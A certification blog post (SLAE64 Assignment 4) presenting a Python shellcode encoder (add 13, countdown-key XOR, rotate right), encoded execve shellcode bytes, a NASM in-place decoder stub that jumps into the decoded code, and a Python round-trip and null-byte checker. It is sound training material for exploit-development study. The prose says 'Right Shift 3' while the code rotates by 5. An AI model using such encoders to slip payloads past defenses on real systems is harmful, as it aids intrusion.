SLAE64: Assignment 4 – Custom Encoder

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification:

https://www.pentesteracademy.com/course?id=7

Student-ID: PA-15847

The Objectives for the Assignment:

– create a custom encoding scheme like the Insertion Encoder
– PoC with execve stack as the shellcode to encode with your scheme and execute

For this we wrote the following Python encoder, which chains three steps per byte: ROT 13 (add 13), XOR with a running key, and a Right Shift 3 rotate. The key starts at the shellcode length and is decremented for every byte, so each position is XORed with a different value:

def ror(val, rot):
	# rotate an 8-bit value right by rot bits; inputs above 0xff (e.g. 0xff + 13) are masked to one byte
	rot %= 8
	val &= 0xff
	return ((val >> rot) | (val << (8 - rot))) & 0xff

def main():
	# replace the placeholder with the raw bytes of the execve stack shellcode
	shellcode = b".....shellcode-here....."
	encoded = ""

	# the XOR key starts at the shellcode length and counts down by one per byte
	i = len(shellcode)
	for x in shellcode:
		# add 13, XOR with the running key, then rotate right by 5
		y = ror((x + 13) ^ i, 5)
		encoded += "0x%02x," % y
		i -= 1
	# drop the trailing comma so the line can be pasted straight into a db directive
	print("\t" + encoded[:-1])

if __name__ == "__main__":
	main()

Run against the execve stack shellcode it prints the following 32 encoded bytes:

0x5d,0x48,0xf4,0x10,0x52,0xf4,0x89,0x9d,0x9b,0x1b,0x8a,0x4a,0x25,0x99,0x9c,0x11,0xa1,0xfe,0xd4,0x16,0xa6,0x39,0x9b,0x17,0xa7,0x3d,0xd4,0x65,0x72,0xd2,0x87,0xc4

Now we write the decoder in the jmp-call-pop style shown in the class (here the address of the encoded bytes is loaded with a RIP-relative lea). It walks the encoded bytes in place, undoing the three steps in reverse order, then jumps to the decoded code:

; assemble with: nasm -felf64 decoder.nasm && ld -N -o decoder decoder.o
; (-N makes .text writable, which the in-place decode needs when run as an ELF)
global _start

section .text

_start:
	jmp real_start
	; the 32 encoded bytes produced by the Python encoder above
	encoded_shellcode: db 0x5d,0x48,0xf4,0x10,0x52,0xf4,0x89,0x9d,0x9b,0x1b,0x8a,0x4a,0x25,0x99,0x9c,0x11,0xa1,0xfe,0xd4,0x16,0xa6,0x39,0x9b,0x17,0xa7,0x3d,0xd4,0x65,0x72,0xd2,0x87,0xc4

real_start:
	lea rsi, [rel encoded_shellcode]	; rsi -> first encoded byte

decoder:
	xor rax, rax
	add al, 32			; al = XOR key, starts at the length (i in the encoder)
	xor rcx, rcx
	mov cl, 32			; rcx = number of bytes to decode (counter for loop)
decode:
	rol byte [rsi], 0x5		; undo the rotate right by 5
	xor byte [rsi], al		; undo the XOR with the running key
	sub byte [rsi], 13		; undo the +13
	dec al				; key counts down, mirroring i -= 1 in the encoder
	inc rsi
	loop decode

	jmp short encoded_shellcode	; execute the decoded shellcode in place

We’ll compile and run the code to get the original shellcode 🙂
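As an added example (not code from the original post or its GitHub repository), the following Python 3 script models both the encoder above and the NASM decoder loop, checks that the two are exact inverses, and reports any null byte in the encoded output, which would truncate the payload if it were ever copied as a C string. The short hex inputs are constructed sample data, not a real payload; the 32-byte string is the encoded output shown above.

```python
# Python 3 model of the encoder above and of the NASM decoder loop.
# The key handling mirrors the post: it starts at the length and counts down.

def ror8(val, rot):
	"""Rotate an 8-bit value right by rot bits (inputs above 0xff are masked)."""
	rot %= 8
	val &= 0xff
	return ((val >> rot) | (val << (8 - rot))) & 0xff

def rol8(val, rot):
	"""Rotate an 8-bit value left by rot bits: what `rol byte [rsi], 5` does."""
	return ror8(val, 8 - (rot % 8))

def encode(shellcode, rot=5):
	"""Add 13, XOR with the countdown key, then rotate right (the encoder's order)."""
	out, key = bytearray(), len(shellcode)
	for x in shellcode:
		out.append(ror8((x + 13) ^ key, rot))
		key -= 1
	return bytes(out)

def decode(encoded, rot=5):
	"""Inverse of encode, step by step in the order the decoder loop must use."""
	out, key = bytearray(), len(encoded)   # al starts at the length (32 above)
	for y in encoded:
		x = rol8(y, rot)                    # rol byte [rsi], 5
		x ^= key                            # xor byte [rsi], al
		x = (x - 13) & 0xff                 # sub byte [rsi], 13 (wraps in a byte)
		out.append(x)
		key -= 1                            # al must count down, like i in the encoder
	return bytes(out)

def null_bytes(encoded):
	"""Offsets of 0x00 in the output; a null would truncate a string-copied payload."""
	return [i for i, b in enumerate(encoded) if b == 0]

# Constructed sample input (not a real payload): the last byte equals key - 13,
# which is exactly the case that produces a null in this scheme.
SAMPLE = bytes.fromhex("4831c0ff00f4")
# The 32 encoded bytes printed in the post above.
POST_OUTPUT = bytes.fromhex(
	"5d48f41052f4899d9b1b8a4a25999c11a1fed416a6399b17a73dd46572d287c4")

if __name__ == "__main__":
	enc = encode(SAMPLE)
	assert decode(enc) == SAMPLE, "decoder does not invert the encoder"
	print("encoded :", ",".join("0x%02x" % b for b in enc))
	print("nulls at:", null_bytes(enc), "| post output nulls:", null_bytes(POST_OUTPUT))
```

Any offset reported by null_bytes means that input byte (or the key at that position) has to change before the bytes are usable in a string-based delivery; the post's own output is clean.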

For the full code, please check the Github repository:

https://github.com/areyou1or0/SLAE64
